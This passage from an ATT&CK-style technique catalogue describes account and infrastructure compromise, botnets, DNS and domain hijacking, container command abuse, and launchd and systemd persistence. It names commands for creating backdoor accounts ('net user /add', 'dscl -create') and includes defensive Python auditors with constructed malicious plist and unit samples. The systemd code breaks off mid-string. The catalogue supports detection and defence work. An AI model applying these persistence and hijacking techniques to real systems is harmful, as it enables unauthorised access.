A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).<sup>[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)]</sup> Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development; this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup> Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).

The tag is: misp-galaxy:technique="Social Media Accounts - Duplicate"

Compromise Accounts

Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.<sup>[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)]</sup><sup>[[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)]</sup> Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development; this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).

The tag is: misp-galaxy:technique="Compromise Accounts"

Compromise Client Software Binary

Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.

Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)<sup>[[Unit42 Banking Trojans Hooking 2022](https://app.tidalcyber.com/references/411c3df4-08e6-518a-953d-19988b663dc4)]</sup> prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.<sup>[[ESET FontOnLake Analysis 2021](https://app.tidalcyber.com/references/dbcced87-91ee-514f-98c8-29a85d967384)]</sup>

Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.

The tag is: misp-galaxy:technique="Compromise Client Software Binary"

Botnet

Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.<sup>[[Norton Botnet](https://app.tidalcyber.com/references/f97427f1-ea16-4e92-a4a2-4d62a800df15)]</sup> Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.<sup>[[Imperva DDoS for Hire](https://app.tidalcyber.com/references/86f87ec6-058e-45a7-9314-0579a2b4e8f2)]</sup> Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.<sup>[[Dell Dridex Oct 2015](https://app.tidalcyber.com/references/f81ce947-d875-4631-9709-b54c8b5d25bc)]</sup> With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or Distributed Denial of Service (DDoS).

The tag is: misp-galaxy:technique="Botnet"

DNS Server - Duplicate

Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://app.tidalcyber.com/technique/8a7afe43-b814-41b3-8bd8-e1301b8ba5b4)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.

By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization’s traffic, facilitating Collection and Credential Access efforts for the adversary.<sup>[[Talos DNSpionage Nov 2018](https://app.tidalcyber.com/references/d597ad7d-f808-4289-b42a-79807248c2d6)]</sup><sup>[[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)]</sup> Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.<sup>[[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)]</sup><sup>[[Crowdstrike DNS Hijack 2019](https://app.tidalcyber.com/references/969ad6de-9415-464d-ba52-2e61e1814a92)]</sup> Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.<sup>[[CiscoAngler](https://app.tidalcyber.com/references/0b10d7d4-9c18-4fd8-933a-b46e41d618ab)]</sup><sup>[[Proofpoint Domain Shadowing](https://app.tidalcyber.com/references/4653a9a5-95f1-4b02-9bf0-8f1b8cd6c059)]</sup>

The tag is: misp-galaxy:technique="DNS Server - Duplicate"

Domains

Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.<sup>[[ICANNDomainNameHijacking](https://app.tidalcyber.com/references/96c5ec6c-d53d-49c3-bca1-0b6abe0080e6)]</sup> Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.<sup>[[Krebs DNS Hijack 2019](https://app.tidalcyber.com/references/9bdc618d-ff55-4ac8-8967-6039c6c24cb1)]</sup>

Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.<sup>[[Microsoft Sub Takeover 2020](https://app.tidalcyber.com/references/b8005a55-7e77-4dc1-abed-f75a0a3d8afb)]</sup>

Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.<sup>[[Palo Alto Unit 42 Domain Shadowing 2022](https://app.tidalcyber.com/references/ec460017-fd25-5975-b697-c8c11fee960d)]</sup>

The tag is: misp-galaxy:technique="Domains"

Server

Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://app.tidalcyber.com/technique/6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2) or [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23), adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), or email servers to support [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) operations.

The tag is: misp-galaxy:technique="Server"

Serverless

Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) traffic to an adversary-owned command and control server.<sup>[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]</sup><sup>[[AWS Lambda Redirector](https://app.tidalcyber.com/references/9ba87a5d-a140-4959-9905-c4a80e684d56)]</sup> As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.<sup>[[Detecting Command & Control in the Cloud](https://app.tidalcyber.com/references/b12e0288-48cd-46ec-8305-0f4d050782f2)]</sup><sup>[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]</sup>

The tag is: misp-galaxy:technique="Serverless"

Virtual Private Server

Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.<sup>[[NSA NCSC Turla OilRig](https://app.tidalcyber.com/references/3e86a807-5188-4278-9a58-babd23b86410)]</sup>

Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.

The tag is: misp-galaxy:technique="Virtual Private Server"

Web Services

Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user’s access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)), [Exfiltration Over Web Service](https://app.tidalcyber.com/technique/66768217-acdd-4b52-902f-e29483630ad6), or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).<sup>[[Recorded Future Turla Infra 2020](https://app.tidalcyber.com/references/73aaff33-5a0e-40b7-a089-77ac57da8dca)]</sup> Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.

The tag is: misp-galaxy:technique="Web Services"

Compromise Infrastructure

Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[ICANNDomainNameHijacking](https://app.tidalcyber.com/references/96c5ec6c-d53d-49c3-bca1-0b6abe0080e6)]</sup><sup>[[Talos DNSpionage Nov 2018](https://app.tidalcyber.com/references/d597ad7d-f808-4289-b42a-79807248c2d6)]</sup><sup>[[FireEye EPS Awakens Part 2](https://app.tidalcyber.com/references/7fd58ef5-a0b7-40b6-8771-ca5e87740965)]</sup> Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.

Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58)) to further blend in and support staged information gathering and/or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns.<sup>[[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)]</sup> Additionally, adversaries may also compromise infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) and/or proxyware services.<sup>[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)]</sup><sup>[[Sysdig Proxyjacking](https://app.tidalcyber.com/references/26562be2-cab6-5867-9a43-d8a59c663596)]</sup>

By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.<sup>[[NSA NCSC Turla OilRig](https://app.tidalcyber.com/references/3e86a807-5188-4278-9a58-babd23b86410)]</sup>

The tag is: misp-galaxy:technique="Compromise Infrastructure"

Container Administration Command

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.<sup>[[Docker Daemon CLI](https://app.tidalcyber.com/references/ea86eae4-6ad4-4d79-9dd3-dd965a7feb5c)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup><sup>[[Kubernetes Kubelet](https://app.tidalcyber.com/references/57527fb9-d076-4ce1-afb5-e7bdb9c9d74c)]</sup>

In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as <code>docker exec</code> to execute a command within a running container.<sup>[[Docker Entrypoint](https://app.tidalcyber.com/references/c80ad3fd-d7fc-4a7a-8565-da3feaa4a915)]</sup><sup>[[Docker Exec](https://app.tidalcyber.com/references/5f1ace27-6584-4585-98de-52cb71d419c1)]</sup> In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as <code>kubectl exec</code>.<sup>[[Kubectl Exec Get Shell](https://app.tidalcyber.com/references/ffb9c0ca-533f-4911-8c0c-a2653410a76d)]</sup>

The tag is: misp-galaxy:technique="Container Administration Command"

Container and Resource Discovery

Adversaries may attempt to discover containers and other resources that are available within a container environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.

These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.<sup>[[Docker API](https://app.tidalcyber.com/references/b8ec1e37-7286-40e8-9577-ff9c54801086)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup> In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.

The tag is: misp-galaxy:technique="Container and Resource Discovery"

Content Injection

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5) followed by [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) and other data to already compromised systems.<sup>[[ESET MoustachedBouncer](https://app.tidalcyber.com/references/6c85e925-d42b-590c-a424-14ebb49812bb)]</sup>

Adversaries may inject content to victim systems in various ways, including:

Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."<sup>[[Kaspersky ManOnTheSide](https://app.tidalcyber.com/references/8ea545ac-cca6-5da5-8a93-6b07518fc9d4)]</sup><sup>[[ESET MoustachedBouncer](https://app.tidalcyber.com/references/6c85e925-d42b-590c-a424-14ebb49812bb)]</sup><sup>[[EFF China GitHub Attack](https://app.tidalcyber.com/references/b8405628-6366-5cc9-a9af-b97d5c9176dd)]</sup>

The tag is: misp-galaxy:technique="Content Injection"

Cloud Account

Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.<sup>[[Microsoft O365 Admin Roles](https://app.tidalcyber.com/references/8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a)]</sup><sup>[[Microsoft Support O365 Add Another Admin, October 2019](https://app.tidalcyber.com/references/c31cfc48-289e-42aa-8046-b41261fdeb96)]</sup><sup>[[AWS Create IAM User](https://app.tidalcyber.com/references/bb474e88-b7bb-4b92-837c-95fe7bdd03f7)]</sup><sup>[[GCP Create Cloud Identity Users](https://app.tidalcyber.com/references/e91748b2-1432-4203-a1fe-100aa70458d2)]</sup><sup>[[Microsoft Azure AD Users](https://app.tidalcyber.com/references/b69468a2-693e-4bd0-8dc1-ccfd7d5630c0)]</sup>

Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.

Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) or assigning [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1).

The tag is: misp-galaxy:technique="Cloud Account"

Domain Account

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.

Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:technique="Domain Account"

Local Account

Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

For example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as <code>username</code>, or to Kubernetes clusters using the kubectl utility.<sup>[[cisco_username_cmd](https://app.tidalcyber.com/references/8e7b99d7-ad94-5802-a1ee-6334842e7e0b)]</sup><sup>[[Kubernetes Service Accounts Security](https://app.tidalcyber.com/references/522eaa6b-0075-5346-bf3c-db1e7820aba2)]</sup>

Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:technique="Local Account"

Create Account

Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.

Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.

The tag is: misp-galaxy:technique="Create Account"

Launch Agent

Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>.<sup>[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)]</sup><sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup> <sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup> Property list files use the <code>Label</code>, <code>ProgramArguments</code>, and <code>RunAtLoad</code> keys to identify the Launch Agent’s name, executable location, and execution time.<sup>[[OSX.Dok Malware](https://app.tidalcyber.com/references/71d65081-dada-4a69-94c5-f1d8e4e151c1)]</sup> Launch Agents are often installed to perform updates to programs, launch user-specified programs at login, or to conduct other developer tasks.

Launch Agents can also be executed using the [Launchctl](https://app.tidalcyber.com/technique/8edc6345-c423-4872-9e22-11e22d9164ff) command.

Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the <code>RunAtLoad</code> or <code>KeepAlive</code> keys set to <code>true</code>.<sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup><sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup> The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.<sup>[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)]</sup><sup>[[OceanLotus for OS X](https://app.tidalcyber.com/references/6e9acc29-06af-4915-8e01-7dcccb204530)]</sup>

The tag is: misp-galaxy:technique="Launch Agent"

Launch Daemon

Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.<sup>[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)]</sup><sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup><sup>[[launchd Keywords for plists](https://app.tidalcyber.com/references/1bcd2a93-93e7-48d8-ad25-6f09e94123aa)]</sup>

Adversaries may install a Launch Daemon configured to execute at startup by using the <code>RunAtLoad</code> parameter set to <code>true</code> and the <code>Program</code> parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd)). When the Launch Daemon is executed, the program inherits administrative permissions.<sup>[[WireLurker](https://app.tidalcyber.com/references/fd33f71b-767d-4312-a8c9-5446939bb5ae)]</sup><sup>[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)]</sup>

Additionally, system configuration changes (such as the installation of third-party package management software) may cause folders such as <code>/usr/local/bin</code> to become globally writable. Such poor configurations can allow an adversary to modify executables referenced by existing Launch Daemons’ plist files.<sup>[[LaunchDaemon Hijacking](https://app.tidalcyber.com/references/51d1e4d9-265a-48ca-834b-4daa1f386bb4)]</sup><sup>[[sentinelone macos persist Jun 2019](https://app.tidalcyber.com/references/81a49043-cac5-40e0-a626-fd242d21c56d)]</sup>
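The Launch Agent and Launch Daemon entries above describe the same plist keys (<code>Label</code>, <code>Program</code>/<code>ProgramArguments</code>, <code>RunAtLoad</code>, <code>KeepAlive</code>) and the hijacking risk of a world-writable executable directory. The following is an added example, not code from the galaxy or from Apple, that audits one plist the way a triage script would: it resolves the executable with launchd's precedence, flags auto-start, an Apple-style label pointing outside Apple paths, scratch or hidden locations, and a world-writable parent directory. The plist and the <code>demo_stat</code> permissions are constructed for the demonstration.

```python
"""Audit a launchd Agent/Daemon plist for persistence-relevant settings (added example)."""
import os
import plistlib
import stat

# Keys that make the job run without user action.
AUTOSTART_KEYS = ("RunAtLoad", "KeepAlive")
# Where an executable behind a com.apple.* label is expected to live.
APPLE_BINARY_ROOTS = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")
# Locations that legitimate agents and daemons rarely execute from.
SCRATCH_ROOTS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")

# Constructed sample plist (not real malware): Apple-style label, hidden payload path.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
 "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.softwareupdate.helper</string>
  <key>ProgramArguments</key>
  <array><string>/Users/Shared/.update/helper</string><string>--quiet</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""


def program_path(plist):
    """Resolve the executable: Program wins, otherwise ProgramArguments[0] (launchd semantics)."""
    if plist.get("Program"):
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else None


def dir_is_world_writable(directory, stat_func=os.stat):
    """True if the directory grants write to 'other', the misconfiguration described above.

    A sticky bit (as on /tmp) still prevents non-owners from replacing files, so treat
    this as a strong signal rather than proof of a hijackable path.
    """
    try:
        st = stat_func(directory)
    except OSError:
        return False  # missing directory: nothing to hijack yet
    return stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)


def inspect_launchd_plist(data, stat_func=os.stat):
    """Return label, executable, auto-start keys and findings for one plist (XML or binary)."""
    plist = plistlib.loads(data)
    label = plist.get("Label", "")
    exe = program_path(plist)
    # KeepAlive may be a bool or a dict of conditions; both keep the job running.
    autostart = [k for k in AUTOSTART_KEYS
                 if plist.get(k) is True or isinstance(plist.get(k), dict)]
    findings = []
    if exe is None:
        findings.append("no Program/ProgramArguments: nothing would run")
        return {"label": label, "program": None, "autostart": autostart, "findings": findings}
    if autostart:
        findings.append("starts without user action via " + ",".join(autostart))
    if label.startswith("com.apple.") and not exe.startswith(APPLE_BINARY_ROOTS):
        findings.append("Apple-style Label but executable outside Apple paths: " + exe)
    if exe.startswith(SCRATCH_ROOTS) or "/." in exe:
        findings.append("executable in a scratch or hidden location: " + exe)
    exe_dir = os.path.dirname(exe)
    if dir_is_world_writable(exe_dir, stat_func):
        findings.append("executable directory is world-writable (hijackable): " + exe_dir)
    return {"label": label, "program": exe, "autostart": autostart, "findings": findings}


def demo_stat(path):
    """Constructed stat: pretend the payload directory is mode 0777, everything else 0755."""
    mode = stat.S_IFDIR | (0o777 if path == "/Users/Shared/.update" else 0o755)
    return os.stat_result((mode, 0, 0, 0, 0, 0, 0, 0, 0, 0))


def run_demo():
    """Inspect the sample plist against the constructed permissions."""
    return inspect_launchd_plist(SAMPLE_PLIST, stat_func=demo_stat)


if __name__ == "__main__":
    for line in run_demo()["findings"]:
        print("-", line)
```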

The tag is: misp-galaxy:technique="Launch Daemon"

Systemd Service

Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.<sup>[[Linux man-pages: systemd January 2014](https://app.tidalcyber.com/references/e9a58efd-8de6-40c9-9638-c642311d6a07)]</sup> Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.

Systemd utilizes unit configuration files with the <code>.service</code> file extension to encode information about a service’s process. By default, system level unit files are stored in the <code>/systemd/system</code> directory of the root owned directories (<code>/</code>). User level unit files are stored in the <code>/systemd/user</code> directories of the user owned directories (<code>$HOME</code>).<sup>[[lambert systemd 2022](https://app.tidalcyber.com/references/196f0c77-4c98-57e7-ad79-eb43bdd2c848)]</sup>

Inside the .service unit files, the following directives are used to execute commands:<sup>[[freedesktop systemd.service](https://app.tidalcyber.com/references/cae49a7a-db3b-5202-ba45-fbfa98b073c9)]</sup>

  • ExecStart, ExecStartPre, and ExecStartPost directives execute when a service is started manually by systemctl or on system start if the service is set to automatically start.

  • ExecReload directive executes when a service restarts.

  • ExecStop, ExecStopPre, and ExecStopPost directives execute when a service is stopped.

Adversaries have created new service files, altered the commands a .service file’s directive executes, and modified the user directive a .service file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.<sup>[[Anomali Rocke March 2019](https://app.tidalcyber.com/references/31051c8a-b523-4b8e-b834-2168c59e783b)]</sup><sup>[[airwalk backdoor unix systems](https://app.tidalcyber.com/references/3f3bca4a-68fa-5d4a-b86f-36f82345ff36)]</sup><sup>[[Rapid7 Service Persistence 22JUNE2016](https://app.tidalcyber.com/references/75441af3-2ff6-42c8-b7f1-c8dc2c27efe2)]</sup>
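The directives listed above are what a detection has to read back out of a unit file. The following is an added example, not code from the galaxy or from systemd, that parses a <code>.service</code> file while keeping repeated keys, strips the prefix characters systemd allows before an executable, and reports the three changes the text describes: commands pointing at scratch or hidden paths, commands that drifted from a known-good baseline, and a unit file that is really a symlink. The sample unit and baseline are constructed for the demonstration.

```python
"""Parse a systemd .service unit and flag risky Exec*/User settings (added example)."""
import os

# Directives from the text above that cause command execution.
EXEC_DIRECTIVES = ("ExecStart", "ExecStartPre", "ExecStartPost",
                   "ExecReload", "ExecStop", "ExecStopPre", "ExecStopPost")
# systemd permits these prefix characters before the executable path.
EXEC_PREFIXES = "-@+!:"
# Paths from which legitimate services rarely execute.
SUSPICIOUS_ROOTS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")

# Constructed sample unit (not from any real incident).
SAMPLE_UNIT = """\
[Unit]
Description=System Updater

[Service]
Type=simple
User=root
ExecStartPre=-/bin/mkdir -p /dev/shm/.x
ExecStart=/dev/shm/.x/updater --daemon
ExecReload=/bin/kill -HUP $MAINPID

[Install]
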